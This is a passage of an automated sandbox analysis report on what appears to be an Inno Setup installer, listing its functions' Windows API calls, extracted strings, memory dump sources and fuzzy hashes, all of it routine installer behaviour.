                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirstNext
                                                            • String ID: isRS-$isRS-???.tmp
                                                            • API String ID: 134685335-3422211394
                                                            • Opcode ID: 3affe16ed425f9283171b1eb0e7714abad28a6a77db8245eb00c896bf4ec8b38
                                                            • Instruction ID: d39c6702953267373b2098697dd7c4daff6c19a754f4e73b98016d5d2bb0ed42
                                                            • Opcode Fuzzy Hash: 3affe16ed425f9283171b1eb0e7714abad28a6a77db8245eb00c896bf4ec8b38
                                                            • Instruction Fuzzy Hash: E6317670A006189FDB10DF65DC45ADEB7BEEB84304F5145FAE804A3291EB389E81CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C90B4, Relevance: 9.1, APIs: 6, Instructions: 98windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsIconic.USER32(?), ref: 005C90F9
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 005C9116
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 005C913B
                                                            • GetActiveWindow.USER32 ref: 005C9149
                                                            • MessageBoxW.USER32(00000000,00000000,?,000000E5), ref: 005C9176
                                                            • SetActiveWindow.USER32(00000000,005C91A4,?,000000EC,?,000000F0,?,00000000,005C91DA,?,?,00000000), ref: 005C9197
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Window$ActiveLong$IconicMessage
                                                            • String ID:
                                                            • API String ID: 1633107849-0
                                                            • Opcode ID: 8e29fb634f2bd42e54d76323cdfd72ae6654eabf5b00baf4e96ba8bdb3ccec15
                                                            • Instruction ID: 0eaebbc0e28104152e09dfddf635ce6469108de93c670a6b66e2a7222b47ea08
                                                            • Opcode Fuzzy Hash: 8e29fb634f2bd42e54d76323cdfd72ae6654eabf5b00baf4e96ba8bdb3ccec15
                                                            • Instruction Fuzzy Hash: 4F319375A04605AFDB00EFA9DD4AF9A7BF9FB89350B1544A9F400D73A1DB34AD00DB14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0062CFB8, Relevance: 3.1, APIs: 2, Instructions: 52comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetVersion.KERNEL32(00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFD5
                                                            • CoCreateInstance.OLE32(006CD0C4,00000000,00000001,006CD0D4,00000000,00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFFB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateInstanceVersion
                                                            • String ID:
                                                            • API String ID: 1462612201-0
                                                            • Opcode ID: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
                                                            • Instruction ID: 9475dfad4fa877b1df6a840545b6a6068a8d92e7f1f871649489f85859f50de3
                                                            • Opcode Fuzzy Hash: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
                                                            • Instruction Fuzzy Hash: F511D231648A04AFEB10EF69ED4AF5A77EEEB45308F4214BAF400D7AA1C775AD10CB15
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C8B3C, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InitializeSecurityDescriptor.ADVAPI32(00000001,00000001), ref: 005C8B49
                                                            • SetSecurityDescriptorDacl.ADVAPI32(00000000,000000FF,00000000,00000000,00000001,00000001), ref: 005C8B59
                                                              • Part of subcall function 00413E90: CreateMutexW.KERNEL32(?,00000001,00000000,?,006B91D7,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000), ref: 00413EA6
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: DescriptorSecurity$CreateDaclInitializeMutex
                                                            • String ID:
                                                            • API String ID: 3525989157-0
                                                            • Opcode ID: 8c33769221f5c02fb9acf0c53c91398d8a51c8b1cb76e2f494f5bcae13adf59b
                                                            • Instruction ID: 330012b0c6753e8d8900aa9d7e53afb48d76169d5e03c13c529c7fe63a2e2798
                                                            • Opcode Fuzzy Hash: 8c33769221f5c02fb9acf0c53c91398d8a51c8b1cb76e2f494f5bcae13adf59b
                                                            • Instruction Fuzzy Hash: E9E092B16443006FE700DFB58C86F9B77DC9B84725F104A2EB664DB2C1E778DA48879A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B9138, Relevance: 24.8, APIs: 6, Strings: 8, Instructions: 260COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000,?,006B99DE,00000000,006B99E8,?,00000000), ref: 006B91BF
                                                            • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000), ref: 006B91E5
                                                            • MsgWaitForMultipleObjects.USER32 ref: 006B9206
                                                            • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000), ref: 006B921B
                                                              • Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ShowWindow$FileModuleMultipleNameObjectsWait
                                                            • String ID: (\m$.lst$.msg$/REG$/REGU$<`m$Inno-Setup-RegSvr-Mutex$Setup
                                                            • API String ID: 66301061-906243933
                                                            • Opcode ID: de3423d4672b2301b2fae71c06c42d2de60b5f331c7d665ace9bfc361c3bdd10
                                                            • Instruction ID: 4d26cb6eac5053f9cdac576eea358071a92945d2d4b93ba07426bed60c59251a
                                                            • Opcode Fuzzy Hash: de3423d4672b2301b2fae71c06c42d2de60b5f331c7d665ace9bfc361c3bdd10
                                                            • Instruction Fuzzy Hash: 9B91D5B0A042059FDB10EBA4D856FEEBBF6FB49304F514469F600A7381DA79AD81CB74
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00625D14, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CloseHandle.KERNEL32(?), ref: 00625D4B
                                                            • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00625D67
                                                            • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00625D75
                                                            • GetExitCodeProcess.KERNEL32 ref: 00625D86
                                                            • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DCD
                                                            • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DE9
                                                            Strings
                                                            • Helper process exited., xrefs: 00625D95
                                                            • Helper process exited with failure code: 0x%x, xrefs: 00625DB3
                                                            • Helper process exited, but failed to get exit code., xrefs: 00625DBF
                                                            • Helper isn't responding; killing it., xrefs: 00625D57
                                                            • Stopping 64-bit helper process. (PID: %u), xrefs: 00625D3D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                            • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                            • API String ID: 3355656108-1243109208
                                                            • Opcode ID: c0b4aeda6ed184155dfbd483c9f69399a01c3cafee286f79e446162a0cb3cd1f
                                                            • Instruction ID: d564c8b30f574b505304bc0216fad519ef2dd9895e072bde183416e8b9fa8f35
                                                            • Opcode Fuzzy Hash: c0b4aeda6ed184155dfbd483c9f69399a01c3cafee286f79e446162a0cb3cd1f
                                                            • Instruction Fuzzy Hash: 9C21AF70604F50AAD330EB78E44578BBBE69F08310F048C2DB59BC7682D734E8808B5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B740C, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 145fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0060D3B4: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
                                                              • Part of subcall function 0060D3B4: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1
                                                            • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,006B75FA), ref: 006B748F
                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,006B75FA), ref: 006B74B6
                                                            • SetWindowLongW.USER32 ref: 006B74F0
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?,00000000), ref: 006B7525
                                                            • MsgWaitForMultipleObjects.USER32 ref: 006B7599
                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000), ref: 006B75A7
                                                              • Part of subcall function 0060D8B0: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996
                                                            • DestroyWindow.USER32(?,006B75CA,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?), ref: 006B75BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileWindow$CloseHandle$AttributesCopyCreateDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                            • String ID: (\m$/SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                            • API String ID: 1779715363-1630723103
                                                            • Opcode ID: 7fedde1d07b3342257f34169e40f84480b518e12dcab26a3e4e2a454b31cf438
                                                            • Instruction ID: ef81c38150d0c0f6437f901880bd06975f11695bff6d213fe2789ed19ae6d402
                                                            • Opcode Fuzzy Hash: 7fedde1d07b3342257f34169e40f84480b518e12dcab26a3e4e2a454b31cf438
                                                            • Instruction Fuzzy Hash: EE4181B1A04208AFDB00EFB5DC56EDE7BF9EB89314F11456AF500F7291DB789A408B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00625FC4, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 124pipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000,00000000,006261A7,?,00000000,00626202,?,?,00000000,00000000), ref: 00626021
                                                            • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062607E
                                                            • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062608B
                                                            • MsgWaitForMultipleObjects.USER32 ref: 006260D7
                                                            • GetOverlappedResult.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626101
                                                            • GetLastError.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626108
                                                              • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                            • String ID: CreateEvent$TransactNamedPipe
                                                            • API String ID: 2182916169-3012584893
                                                            • Opcode ID: acb36331ee21d08b7d289947a02b8ab598f29c5b04c1412d9fc7a2506ad31a00
                                                            • Instruction ID: 6106728f610c95dcbec9252819f2c5c1e9fccb50d9899b4423df3e52f48f78ac
                                                            • Opcode Fuzzy Hash: acb36331ee21d08b7d289947a02b8ab598f29c5b04c1412d9fc7a2506ad31a00
                                                            • Instruction Fuzzy Hash: 6441AC70A00618EFDB05DF99DD85EDEBBBAEB08310F1041A9F904E7392D674AE50CB24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040DF90, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000,00000000), ref: 0040DFAE
                                                            • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFD2
                                                            • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFE1
                                                            • IsValidLocale.KERNEL32(00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040DFF3
                                                            • EnterCriticalSection.KERNEL32(006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E050
                                                            • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E079
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                            • String ID: en-US,en,
                                                            • API String ID: 975949045-3579323720
                                                            • Opcode ID: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
                                                            • Instruction ID: 7d1429daecdd90a797f7fba0e37e49eac4d41b909b59f49409e6443efac98480
                                                            • Opcode Fuzzy Hash: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
                                                            • Instruction Fuzzy Hash: F7218A60B90614A6DB10B7B78C0265A3245DB46708F51487BB540BF3C7CAFD8D558AAF
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C7FF4, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C801B
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            • RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C806E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressCloseHandleModuleProc
                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                            • API String ID: 4190037839-2401316094
                                                            • Opcode ID: 9ecea8ea030eead22ebc029c49188dd1b7d15adc30014d18dbe4d38bf6596737
                                                            • Instruction ID: b59d3067a1cffae51886ca0dc1f1740e66d40653876fb7099798d5cffc045aa9
                                                            • Opcode Fuzzy Hash: 9ecea8ea030eead22ebc029c49188dd1b7d15adc30014d18dbe4d38bf6596737
                                                            • Instruction Fuzzy Hash: 51214F34A04209AFDB10EAE5CC5AFFE7BE9FB48704F60486DA500F3681EE74AA45C755
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00624BA8, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 124COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00624D58,00000000, /s ",006D579C,regsvr32.exe",?,00624D58), ref: 00624CC6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
